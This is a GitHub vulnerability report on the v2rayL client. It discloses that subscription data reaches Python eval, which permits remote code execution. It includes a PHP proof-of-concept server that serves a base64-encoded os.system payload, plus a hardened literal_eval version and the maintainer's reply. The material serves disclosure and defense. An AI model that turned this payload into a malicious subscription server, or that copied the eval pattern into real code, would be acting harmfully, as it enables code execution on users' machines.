jiangxufeng / v2rayL

v2ray Linux GUI client, supporting subscriptions, vmess, ss and other protocols, with automatic subscription updates and version update checks
GNU General Public License v3.0

RCE Vulnerability in sub2conf_api.py(line 45) #44

Closed TomAPU closed 4 years ago

TomAPU commented 4 years ago

The vulnerability is in function b642conf at sub2conf_api.py (line 45). In this function, to convert a string to a dict, the author used the function eval to do so.

    def b642conf(self, prot, tp, b64str):
        if prot == "vmess":
            ret = eval(parse.unquote(base64.b64decode(b64str).decode()))
            region = ret['ps']

However, this function is UNSAFE: anyone who controls the b64str string can execute any Python code he/she wants on your machine. When the user clicks the button 更新订阅 (update subscription), the client sends an HTTP request to the subscription server for subscription data. A malicious subscription server can send a crafted HTTP response to the client to execute arbitrary Python code on the client's machine! Anyone who controls the data, from the server owner to a MITM attacker or hackers who control the server, can execute any code on the client's machine.

POC CODE

    <?php
    // move the file into /var/www/html/index.php and launch your apache service. set the subscribing server as http://127.0.0.1/ and click the button
    $shellcode="__import__('os').system('gedit')";
    $payload="vmess://";
    $payload.=base64_encode($shellcode);
    $payload.="\n";
    $payload=base64_encode($payload);
    echo $payload;
    ?>

POC EXPLOITED RESULT: [screenshot: 2019-11-01-141017_1031x543_scrot]

FIX SUGGESTION: use literal_eval instead of eval. literal_eval can do the same thing (convert string to dict) safely.
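A hardened version of the decoding path discussed in this issue, added here as an example; it is neither the project's code nor the reporter's PoC. It replaces eval with ast.literal_eval as suggested, validates the resulting dict, and parses a whole subscription body so that one bad entry is reported rather than executed or allowed to abort the update. The function names, the REQUIRED_STR_FIELDS set and the sample subscription are assumptions constructed for the example.

```python
import ast
import base64
import binascii
from urllib.parse import unquote

REQUIRED_STR_FIELDS = ("ps", "add")  # assumption: fields the client must have

def b642conf_safe(b64str: str) -> dict:
    """Hardened replacement for the eval() in b642conf: base64 -> unquote ->
    ast.literal_eval, then validate the shape before anything uses it."""
    try:
        text = unquote(base64.b64decode(b64str, validate=True).decode("utf-8"))
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError("entry is not valid base64/UTF-8") from exc
    try:
        # literal_eval builds only literals; a call like __import__('os').system() raises ValueError and never runs
        obj = ast.literal_eval(text)
    except (ValueError, SyntaxError, MemoryError, RecursionError) as exc:
        raise ValueError("entry is not a literal") from exc
    if not isinstance(obj, dict):
        raise ValueError("entry is not a dict")
    for field in REQUIRED_STR_FIELDS:
        if not isinstance(obj.get(field), str):
            raise ValueError(f"entry missing string field {field!r}")
    return obj

def parse_subscription(sub_b64: str) -> tuple[list[dict], list[str]]:
    """Decode a subscription body (base64 of newline-separated scheme://payload
    lines). Returns (accepted vmess entries, rejection reasons); a bad entry is
    reported, never executed, and does not abort the whole update."""
    accepted, rejected = [], []
    body = base64.b64decode(sub_b64).decode("utf-8", errors="replace")
    for line in body.split():  # entries contain no whitespace; blank lines vanish
        prot, _, payload = line.partition("://")
        if prot != "vmess" or not payload:
            rejected.append(f"unsupported entry: {line[:16]!r}")
            continue
        try:
            accepted.append(b642conf_safe(payload))
        except ValueError as exc:
            rejected.append(f"vmess entry rejected: {exc}")
    return accepted, rejected

# Constructed sample subscription (not real data): one benign entry, one
# non-vmess entry, and one carrying the expression from the issue's PoC.
GOOD_ENTRY = base64.b64encode(b"{'ps': 'node-1', 'add': 'example.invalid', 'port': 443}").decode()
BAD_ENTRY = base64.b64encode(b"__import__('os').system('gedit')").decode()
SAMPLE_SUB = base64.b64encode(f"vmess://{GOOD_ENTRY}\nss://not-handled\nvmess://{BAD_ENTRY}\n".encode()).decode()
```

Running `parse_subscription(SAMPLE_SUB)` yields the single benign node as accepted and two rejection reasons, with the injected expression rejected as a non-literal.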

jiangxufeng commented 4 years ago

Thank you for your issue; the next update will solve this problem. Thank you.